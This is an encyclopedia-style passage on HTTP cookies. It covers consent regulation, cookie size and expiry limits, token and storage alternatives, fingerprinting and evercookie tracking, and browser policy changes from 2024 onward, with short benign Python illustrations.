These regulations have driven widespread adoption of cookie consent banners across EU websites: a measurement study documented a 16% increase in their prevalence among 6,579 sites following GDPR implementation. Banners often offer granular choices but are plagued by dark patterns that nudge users toward acceptance. Economically, compliance burdens fall disproportionately on smaller websites and startups, prompting some to geoblock EU visitors or invest in consent management platforms, while larger firms like Meta report minimal revenue impact from reduced tracking.

On privacy outcomes, empirical analyses reveal limited shifts in user behavior: a 2020 study found no heightened privacy attitudes after GDPR, with users increasingly acquiescing to cookies as routine and viewing banners as annoyances rather than tools of empowerment. Regulation has also spurred evasion tactics, including server-side tracking and device fingerprinting, which evade cookie-specific rules yet enable persistent profiling with potentially lower transparency, as the rise of first-party methods after consent mandates suggests.
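The prior-consent rule with its strictly-necessary exemption can be sketched as a simple filter applied before any cookie is set. This is only an illustrative model: the category names, the STRICTLY_NECESSARY constant, and the cookies_allowed helper are hypothetical, and real consent management platforms track considerably more state.

```python
from typing import Dict, Set

# Hypothetical category label for cookies exempt from the consent requirement.
STRICTLY_NECESSARY = "strictly_necessary"


def cookies_allowed(pending: Dict[str, str], consented: Set[str]) -> Dict[str, str]:
    """Filter cookies by consent.

    `pending` maps cookie name -> category. A cookie may be set if it is
    strictly necessary or if the user has consented to its category.
    """
    return {
        name: category
        for name, category in pending.items()
        if category == STRICTLY_NECESSARY or category in consented
    }


if __name__ == "__main__":
    pending = {
        "session_id": STRICTLY_NECESSARY,
        "ad_id": "advertising",
        "stats": "analytics",
    }
    # Before any consent is given, only the exempt cookie passes the filter.
    print(cookies_allowed(pending, set()))
    # After the user accepts analytics, that category is added.
    print(cookies_allowed(pending, {"analytics"}))
```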

Limitations and Inefficacies

Identification Shortcomings

HTTP cookies have inherent limitations as a means of persistent, unique user identification because they depend on client-side storage and remain under user control. Users can delete cookies manually or configure the browser to clear them periodically, severing the link to prior session data and forcing re-identification on later visits. Session cookies, which lack an explicit expiration date, are removed automatically when the browser closes, making them unsuitable for long-term tracking. Persistent cookies, though designed for longevity via expiration dates, remain vulnerable to user-initiated clearing and to automated tools that purge stored data.

Cookies are confined to the specific browser and device where they are set, which precludes native cross-device or cross-browser identification. This scoping follows from their implementation as domain-bound, browser-managed storage, so unified user profiles across platforms require supplementary techniques such as device fingerprinting or stitching on logged-in accounts. Without such extensions, cookies cannot correlate activity from, for instance, a mobile Safari session with a desktop Chrome instance.

Third-party cookies, critical for cross-site identification in advertising and analytics, have become increasingly unreliable amid browser restrictions and user opt-outs. Safari's Intelligent Tracking Prevention and Firefox's Enhanced Tracking Protection block or restrict third-party cookies by default, while Google Chrome began a phased deprecation in 2024, starting with 1% of users in the first quarter, with further expansion planned at the time. Surveys indicate that 67% of adults disable cookies or tracking to safeguard their privacy, with global estimates of blocking-tool usage reaching 72% by 2025.

Technical constraints exacerbate these issues: browsers typically cap cookies at around 50 per domain and 4 KB per cookie, limiting how many complex or redundant identifiers can be embedded to improve uniqueness or resilience. Exceeding these thresholds causes cookies to be dropped or rejected, further eroding identification reliability. Together, these shortcomings diminish cookies' efficacy as a standalone identification method and drive reliance on hybrid or cookie-independent approaches.

Technical Drawbacks (Size, Expiration Issues)

HTTP cookies face inherent size constraints that limit their capacity for data storage and their transmission efficiency. RFC 6265 recommends that user agents support at least 4096 bytes per cookie, measured as the combined length of the name, value, and attributes. Cookies that exceed a browser's per-cookie limit are rejected; browsers such as Chrome enforce a hard cap of around 4096-4097 bytes. Per-domain restrictions compound this: some legacy browsers cap each domain at 50 cookies, while some modern ones permit 1000 or more, though total storage across domains rarely exceeds several thousand cookies.

These boundaries force larger payloads to be fragmented across multiple cookies, which bloats request headers, since cookies are attached to every HTTP request within their domain and path scope. The result is higher bandwidth usage and latency, particularly on mobile or low-speed connections. Server-side header limits add a further constraint: NGINX, for example, by default rejects any single request header field larger than 8 KB, so an oversized Cookie header can fail outright, disrupting state persistence and forcing reliance on less efficient alternatives like local storage. Empirical analyses associate bloated cookies with measurable performance degradation, as request sizes swell without proportional gains in utility, underscoring the mechanism's inefficiency for voluminous or complex data.

Expiration handling introduces additional unreliability because it is enforced on the client without server oversight. Persistent cookies rely on the Expires attribute (an absolute date and time) or the Max-Age attribute (an offset in seconds), but both are evaluated locally, so outcomes are vulnerable to inaccurate client clocks, whether from misconfiguration or deliberate tampering, which can invalidate valid cookies prematurely or prolong obsolete ones. A server can request deletion only by re-sending the cookie with an expiry in the past and cannot confirm that the client complied, leaving state dependent on client behavior and exposing systems to stale data in authentication or session contexts.

Formatting errors exacerbate these issues: an unparseable Expires value or a missing expiry attribute causes browsers to fall back to session-cookie behavior, ignoring the intended persistence and yielding unpredictable lifetimes across implementations. Short-lived expirations are also hard to enforce precisely, since the exact moment of removal depends on the client, which complicates scenarios like temporary access tokens. This client-centric model, while decentralized, undermines reliability in time-bound operations and often calls for hybrid approaches that pair cookies with server-side validation to mitigate expiration-induced failures.
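Both drawbacks can be made concrete with a short Python sketch: a size check against the 4096-byte figure from RFC 6265, and a server-side expiry record that does not depend on the client's clock. The names cookie_size, MAX_COOKIE_BYTES, and SessionStore are hypothetical, the in-memory dictionary stands in for whatever session backend a real deployment would use, and actual browsers may count cookie bytes slightly differently.

```python
import time
from typing import Dict, Optional

# Per-cookie minimum that RFC 6265 asks user agents to support.
MAX_COOKIE_BYTES = 4096


def cookie_size(name: str, value: str, attributes: str = "") -> int:
    """Sum the UTF-8 byte lengths of the name, value, and attribute string."""
    return sum(len(part.encode("utf-8")) for part in (name, value, attributes))


class SessionStore:
    """Keep the authoritative expiry time on the server (illustrative only)."""

    def __init__(self) -> None:
        self._expires_at: Dict[str, float] = {}

    def create(self, session_id: str, ttl_seconds: float,
               now: Optional[float] = None) -> None:
        current = time.time() if now is None else now
        self._expires_at[session_id] = current + ttl_seconds

    def is_valid(self, session_id: str, now: Optional[float] = None) -> bool:
        current = time.time() if now is None else now
        expires_at = self._expires_at.get(session_id)
        if expires_at is None or current >= expires_at:
            # Unknown or expired: forget it, whatever the client still holds.
            self._expires_at.pop(session_id, None)
            return False
        return True


if __name__ == "__main__":
    print(cookie_size("id", "abc", "; Path=/"))
    print(cookie_size("blob", "x" * 5000) > MAX_COOKIE_BYTES)
    store = SessionStore()
    store.create("s1", ttl_seconds=60, now=1000.0)
    print(store.is_valid("s1", now=1030.0), store.is_valid("s1", now=1060.0))
```

With the expiry held server-side, a cookie that outlives its intended lifetime on a misconfigured client is simply rejected on its next use.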

Alternatives and Evolutions

Session and Authentication Substitutes

Token-based authentication, particularly with JSON Web Tokens (JWTs), provides a stateless substitute for cookie-managed sessions by encoding user claims and expiration data in a compact, digitally signed structure that clients transmit in an HTTP request header, typically the Authorization header with the Bearer scheme. This approach removes the need for server-side session storage and eases scaling, since each token can be verified independently with a shared secret or public key, without a database query. Standardized in RFC 7519 in May 2015, JWTs support registered claims such as issuer, audience, and subject, enabling secure propagation across services. However, tokens must be stored client-side (for example, in memory or localStorage), which exposes them to extraction via cross-site scripting (XSS) if not handled carefully, unlike HttpOnly cookies, which are inaccessible to scripts.

For browser-based applications seeking cookie-less sessions, localStorage and sessionStorage offer key-value persistence without automatic transmission to the server, which suits single-page applications (SPAs) where JavaScript retrieves identifiers and attaches them to requests manually. localStorage persists across browser sessions until explicitly cleared, with a typical quota of 5-10 MB per origin depending on the browser (Chrome, for example, allowed about 10 MB as of 2024), while sessionStorage is cleared when the tab closes. These mechanisms let a session survive a page refresh but falter in multi-tab scenarios or incognito mode, and their accessibility to JavaScript leaves them vulnerable to XSS, prompting recommendations for short-lived tokens combined with refresh mechanisms. Empirical analyses indicate that localStorage suits non-sensitive state but is weaker than cookies for security-critical authentication because it lacks built-in protections like the Secure or SameSite attributes.

URL rewriting appends session identifiers directly to URLs (for example, ?sessionId=abc123), enabling tracking without cookies or storage APIs. The method dates to the early web but is largely deprecated because it exposes IDs in browser history, Referer headers, and server logs. It risks session hijacking if IDs leak via email or social shares, and it burdens applications with manual URL management in non-GET requests. Hidden form fields embed identifiers in HTML forms for POST-based state transfer; they work for sequential interactions but not for direct navigation or AJAX calls, limiting them to legacy form-heavy sites.

OAuth 2.0 access tokens function as short-lived substitutes for persistent cookie authentication, granting scoped access without embedding credentials, and are often paired with JWTs for self-contained verification in API ecosystems. Standardized in RFC 6749 in October 2012, these bearer tokens demand secure transmission (for example, over HTTPS) and a revocation mechanism for invalidation, trading cookie convenience for finer-grained control in federated systems. Security evaluations highlight that cookie-less tokens avoid cross-site request forgery (CSRF), because the browser does not attach them automatically, but they amplify XSS risks and complicate logout, as tokens remain valid until expiry unless invalidated centrally.

Web Workers offer an isolated place to hold ephemeral secrets, out of reach of main-thread scripts, which mitigates some XSS vectors, though the data does not survive page reloads. Overall, these substitutes prioritize API and mobile compatibility over traditional web ergonomics. Adoption surged after 2020 amid third-party cookie deprecations, yet analyses favor hybrid cookie-token models for optimal browser security.
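To illustrate the stateless verification that token-based authentication relies on, the following Python sketch signs and verifies a JWT-style token with HMAC-SHA256 (the HS256 algorithm) using only the standard library. It is a simplified teaching example, not a complete RFC 7519 implementation: the function names sign_token, verify_token, and bearer_header are hypothetical, only the exp claim is checked, and production systems would normally use a maintained JWT library.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional


def _b64url_encode(data: bytes) -> str:
    # JWTs use URL-safe base64 without trailing padding.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(claims: dict, secret: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    ]
    signing_input = ".".join(parts)
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(signature)


def verify_token(token: str, secret: bytes,
                 now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the signature and expiry check out, else None."""
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(signature_b64)
    except ValueError:
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    signing_input = (header_b64 + "." + payload_b64).encode("utf-8")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):  # constant-time comparison
        return None
    try:
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:
        return None
    if not isinstance(claims, dict):
        return None
    current = time.time() if now is None else now
    exp = claims.get("exp")
    if isinstance(exp, (int, float)) and current >= exp:
        return None  # token has expired
    return claims


def bearer_header(token: str) -> Dict[str, str]:
    # The client attaches the token explicitly; nothing is sent automatically.
    return {"Authorization": "Bearer " + token}


if __name__ == "__main__":
    secret = b"demo-secret"  # assumption: a shared secret known only to the server
    token = sign_token({"sub": "user-1", "exp": time.time() + 300}, secret)
    print(bearer_header(token))
    print(verify_token(token, secret))
```

Verification needs only the secret and the token itself, which is the property that removes the server-side session lookup. The trade-off noted above also shows here: nothing in this scheme lets the server invalidate a token before its exp time.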

Tracking Innovations Beyond Cookies

Browser fingerprinting emerged as a prominent alternative to HTTP cookies for cross-site user tracking, particularly after browser vendors began restricting third-party cookies in 2020, a trend that accelerated through 2024. The technique compiles a constellation of device and browser attributes, such as user agent strings, screen resolution, installed fonts, hardware concurrency, and graphics capabilities, into a hashed identifier that requires no persistent storage on the client. Unlike cookies, which can be deleted or blocked through browser settings, fingerprinting operates passively through JavaScript or HTTP requests, making it resilient to common privacy measures like cookie clearing.

Canvas fingerprinting, a subset of browser fingerprinting, renders invisible graphics on an HTML5 canvas element and analyzes the resulting pixel data for variations caused by graphics drivers and hardware, yielding high uniqueness even among similar devices. Studies indicate that canvas-based hashes distinguish over 99% of users in controlled tests, as minor rendering differences between GPU implementations create distinct signatures. Similarly, AudioContext fingerprinting exploits inconsistencies in audio processing APIs: it generates an audio signal and hashes the output waveform for identification. This method achieves uniqueness rates comparable to canvas techniques, with entropy values often exceeding 18 bits per user.

Device fingerprinting extends these principles to mobile and cross-device scenarios by incorporating telemetry such as accelerometer data (where accessible) and OS version, enabling probabilistic matching across sessions without cookies. Commercial implementations, such as those from Fingerprint Identification, claim false positive rates below 0.5% in visitor identification by combining over 100 signals into stable profiles that persist despite browser changes.

Server-side tracking complements fingerprinting by logging events directly on ad servers via first-party pixels or APIs, bypassing client-side storage altogether and reducing exposure to ad blockers; the approach gained traction after 2020 with tools like Google Analytics 4's server-side tagging.

Supercookies and evercookies are hybrid techniques that repopulate deleted cookies from alternative storage mechanisms such as HTTP ETags, localStorage, or IndexedDB, ensuring persistence across cookie purges. ETags, originally intended for cache validation, can serve as identifiers: the server embeds a unique token in a response, and the client echoes it back unmodified on later requests, allowing the server to reconstruct session history without traditional cookies. Together, these methods let advertisers maintain user profiles for retargeting. Adoption of fingerprinting rose after Safari introduced Intelligent Tracking Prevention in 2017 and after Chrome announced plans, abandoned in July 2024, to deprecate third-party cookies.
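The core of the fingerprinting approach described above, combining attributes into a hashed identifier, together with the meaning of an entropy figure such as 18 bits, can be sketched in a few lines of Python. The attribute names and values are invented for illustration, and the fingerprint and distinguishable_values helpers are hypothetical; real fingerprinting scripts collect their signals in the browser and use many more of them.

```python
import hashlib
import json


def fingerprint(attributes: dict) -> str:
    """Hash a set of attributes into a stable identifier.

    Keys are sorted so that the same attributes always yield the same hash,
    regardless of the order in which they were collected.
    """
    canonical = json.dumps(attributes, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def distinguishable_values(entropy_bits: float) -> int:
    """Number of equally likely values that `entropy_bits` of entropy can separate."""
    return int(2 ** entropy_bits)


if __name__ == "__main__":
    # Hypothetical attribute values, for illustration only.
    visitor = {
        "user_agent": "ExampleBrowser/1.0",
        "screen": "1920x1080",
        "hardware_concurrency": 8,
        "fonts": ["Arial", "Courier New"],
    }
    print(fingerprint(visitor))
    print(distinguishable_values(18))
```

Nothing is stored on the client in this scheme: the identifier is recomputed on each visit, which is why clearing cookies does not reset it, while any change to an input attribute does.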

Recent Browser Policy Shifts (2024 Onward)

In July 2024, Google announced that it was ending its multi-year initiative to deprecate third-party cookies in Chrome, reversing earlier commitments to phase them out by late 2024 or early 2025. The decision followed regulatory scrutiny from bodies including the UK's Competition and Markets Authority, which raised concerns about the potential anticompetitive effects of Google's Privacy Sandbox alternatives, and industry opposition citing disruption to advertising ecosystems. Chrome now preserves user choice, allowing individuals to enable or block third-party cookies through settings prompts, while adding enhanced tracking protections in Incognito mode, such as IP blinding planned for Q3 2025.

Mozilla advanced its anti-tracking measures in 2024 by expanding Total Cookie Protection to all users by default, which partitions third-party cookies by site and blocks those associated with known trackers. In December 2024, Mozilla announced that Firefox 135 would retire the legacy "Do Not Track" signal, deemed ineffective because websites adopted it inconsistently, in favor of the Global Privacy Control (GPC) standard, which lets users signal their preferences about data sales and sharing. These updates build on Firefox's Enhanced Tracking Protection, prioritizing actual blocking of cross-site identifiers over voluntary signals.

Microsoft Edge, built on Chromium, began small-scale trials in mid-2024 to deprecate third-party cookies for under 1% of non-managed users, aiming to assess the impact on web functionality. Unlike Chrome's full reversal, Edge's experiments align with Microsoft's broader privacy tools, including default blocking options under its tracking prevention settings, though no widespread rollout had occurred as of October 2025.

Apple Safari maintained its longstanding Intelligent Tracking Prevention (ITP), introduced in 2017 and blocking all third-party cookies by default since 2020, with no substantive policy changes announced in 2024 or 2025; minor iOS 17.4 adjustments in the EU addressed requirements for alternative browser engines but did not relax cookie restrictions. This continuity reflects Safari's emphasis on heuristic-based fingerprinting detection over cookie-specific toggles, sustaining high barriers to cross-site tracking irrespective of Google's pivot.
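On the server side, honoring the Global Privacy Control signal mentioned above amounts to checking one request header, Sec-GPC, whose value is 1 when the user has enabled the preference. The following Python sketch shows such a check; the gpc_opt_out helper and the plain header mapping are assumptions for illustration, and how a site acts on the signal depends on its own legal obligations.

```python
from typing import Mapping


def gpc_opt_out(headers: Mapping[str, str]) -> bool:
    """Return True if the request carries the Global Privacy Control signal.

    Header names are compared case-insensitively, as HTTP requires.
    """
    for name, value in headers.items():
        if name.lower() == "sec-gpc":
            return value.strip() == "1"
    return False


if __name__ == "__main__":
    request_headers = {"Host": "example.com", "Sec-GPC": "1"}
    if gpc_opt_out(request_headers):
        print("GPC set: skip cookies used for selling or sharing data")
```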
